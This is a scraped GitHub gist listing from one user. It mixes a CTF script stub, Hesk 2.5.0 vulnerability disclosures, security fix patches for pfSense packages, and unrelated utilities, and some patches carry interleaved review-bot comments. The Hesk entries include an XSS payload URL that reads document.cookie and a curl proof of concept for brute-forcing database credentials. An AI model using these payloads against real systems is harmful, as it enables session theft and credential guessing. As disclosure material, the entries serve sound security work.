cedric cedriczirtacic

@cedriczirtacic
cedriczirtacic / paytv.pl
Created Apr 8, 2014
Hacklu-2013 CTF - PayTV-200
View paytv.pl
#!/usr/bin/perl -w
# Pay TV (Category: Web) Author(s): qll, tangled
# These robo-friends were shocked to see that they had to pay to watch the news
# broadcast about the “Oktoberfest”. Can you help them?
# Here is your challenge: https://ctf.fluxfingers.net:1316/
#use strict;
use warnings;
use LWP::UserAgent;
use Data::Dumper;
View Hesk 2.5.0 XSS example
http://www.victim.com/ticket.php?track='),alert(document.cookie);//?&Refresh=36528&f=1
@cedriczirtacic
cedriczirtacic / attack
Last active Aug 29, 2015
Hesk 2.5.0 URL Redirection
View attack
HTTP/1.1 200 OK
Server: test
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2014 14:42:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 13
<h1>TEST</h1>
@cedriczirtacic
cedriczirtacic / gist:c32e8e4348b216c8d555
Created Aug 6, 2014
Hesk 2.5.0 Connection Brute Force
View gist:c32e8e4348b216c8d555
(*) There is no access control on the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This gives an attacker the opportunity to perform a dictionary brute-force attack and check every possible combination of username/password and/or database without needing to make a real connection to the MySQL service.
(*) proof-of-concept:
curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed
Where USERNAME, PASSWORD and DATABASE are the parameters to brute-force.
@cedriczirtacic
cedriczirtacic / puppet-dashboard.patch
Created Mar 19, 2015
More comprehensive restart for puppet-dashboard
View puppet-dashboard.patch
--- /etc/init.d/puppet-dashboard.old 2015-03-19 11:36:46.000000000 -0300
+++ /etc/init.d/puppet-dashboard 2015-03-19 11:39:45.000000000 -0300
@@ -78,7 +78,13 @@
restart () {
stop
- start
+ RETVAL=$?
+ if [ $? -gt 0 ];then
+ return $RETVAL
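Review bot: In restart(), the test [ $? -gt 0 ] runs after RETVAL=$?, so at that point $? holds the exit status of the assignment (always 0) rather than that of stop, and the early return can never be taken. Test the saved value instead, for example: if [ "$RETVAL" -gt 0 ]; then return $RETVAL; fi, or shorten the whole check to: stop || return $?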
View boxing_timer.ino
// Simple boxing timer
// turn on debug strings
#define DEBUG true
// leds
int pingreen = 13;
int pinred = 11;
// buzzer
int pinbuzz = 12;
@cedriczirtacic
cedriczirtacic / gist:7459317
Created Nov 14, 2013
Quick way to get current battery status (tested on Fedora 18).
View gist:7459317
( cd /sys/class/power_supply/BAT1/ && perl -e "printf(\"%%%d\n\",(( "`cat charge_now`" / "`cat charge_full`" ) * 100));" )
@cedriczirtacic
cedriczirtacic / webmin_postgresql_backup_compress.patch
Created Dec 18, 2013
Patch for webmin's postgresql backup script to enable gzip/bzip2 compression.
View webmin_postgresql_backup_compress.patch
--- postgresql/backup.pl.old 2013-12-17 14:50:06.000000000 -0300
+++ postgresql/backup.pl 2013-12-17 16:25:52.000000000 -0300
@@ -2,6 +2,7 @@
# backup.pl
# Called by cron to backup a database
+my $compress;
$no_acl_check++;
require './postgresql-lib.pl';
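Review bot: The new my $compress; at the top of backup.pl has no comment and no initial value, so a reader cannot tell what it holds or which values are valid. Declare it next to the code that assigns it and add a one-line comment; if the value later selects an external compressor, check it against a fixed set of known values before it is used.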
@cedriczirtacic
cedriczirtacic / sarg_pfsense_0.6.10_LFI.patch
Created Mar 11, 2016
Fix for Local File Inclusion (CWE-98) on sarg 0.6.10 pfSense package
View sarg_pfsense_0.6.10_LFI.patch
--- sarg_frame.php.old 2016-03-11 14:25:58.000000000 -0300
+++ sarg_frame.php 2016-03-11 16:09:53.000000000 -0300
@@ -34,6 +34,11 @@
ini_set('memory_limit', '250M');
}
+// Small security check
+if(!empty($_REQUEST['file'])){
+ $_REQUEST['file']=preg_replace('/(\.+\/|\\\.*|\/{2,})*/',"", $_REQUEST['file']);
+}
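Review bot: The preg_replace on $_REQUEST['file'] is a deny-list, and none of its three alternatives matches a single leading "/", so an absolute path passes through unchanged unless later code prefixes a base directory (not visible in this hunk). Prefer resolving the requested name with realpath() and rejecting anything that does not sit under the sarg report directory, or accepting only names that match a strict allow-list pattern. The trailing * on the group also lets the pattern match the empty string; + states the intent more clearly.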
@cedriczirtacic
cedriczirtacic / squidguard_pfsense_1.4._7_RCE.patch
Last active May 4, 2016
Fix for Remote Code Execution (CWE-78) on squidGuard 1.4_7 pfSense package
View squidguard_pfsense_1.4._7_RCE.patch
--- squidguard_blacklist.php.old 2016-05-04 15:01:08.000000000 -0300
+++ squidguard_blacklist.php 2016-05-04 15:46:13.000000000 -0300
@@ -58,11 +58,19 @@
function squidguard_blacklist_AJAX_response( $request )
{
$res = '';
+ $status = '';
$sz = 0;
$pcaption = '&nbsp;';